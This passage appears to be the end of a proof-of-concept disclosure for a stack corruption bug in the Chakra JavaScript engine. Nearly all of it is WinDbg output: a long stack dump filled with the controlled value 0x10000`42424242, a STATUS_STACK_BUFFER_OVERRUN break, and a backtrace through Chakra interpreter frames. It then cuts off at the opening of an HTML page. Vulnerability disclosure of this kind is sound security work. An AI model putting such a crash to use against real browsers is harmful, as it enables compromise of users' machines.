00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n0:016> g\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(1590.b70): Break instruction exception - code 80000003 (first chance)\r\nKERNELBASE!UnhandledExceptionFilter+0x85960:\r\n00007ffe`9e61c120 cc int 3\r\n0:016> kb\r\nRetAddr : Args to Child : Call Site\r\n00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960\r\n00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a\r\n00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169\r\n00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38\r\n00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd\r\n00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368\r\n00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e\r\n00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d\r\n00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5\r\n00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n \r\n \r\n-->\r\n<html>\r\n<head>\r\n<title> 